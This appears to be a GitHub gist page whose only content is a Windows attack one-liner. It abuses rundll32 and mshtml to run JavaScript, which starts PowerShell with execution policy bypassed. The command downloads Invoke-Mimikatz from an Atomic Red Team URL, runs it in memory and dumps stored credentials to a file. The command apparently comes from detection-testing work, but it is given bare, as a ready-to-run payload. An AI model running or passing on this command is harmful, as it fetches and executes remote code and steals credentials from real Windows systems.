Skip to content

Instantly share code, notes, and snippets.

@joenorton8014
Created March 2, 2018 21:18
Show Gist options
  • Save joenorton8014/68828d9ea6c6afc19469376a2068fc76 to your computer and use it in GitHub Desktop.
Save joenorton8014/68828d9ea6c6afc19469376a2068fc76 to your computer and use it in GitHub Desktop.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > test.txt")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment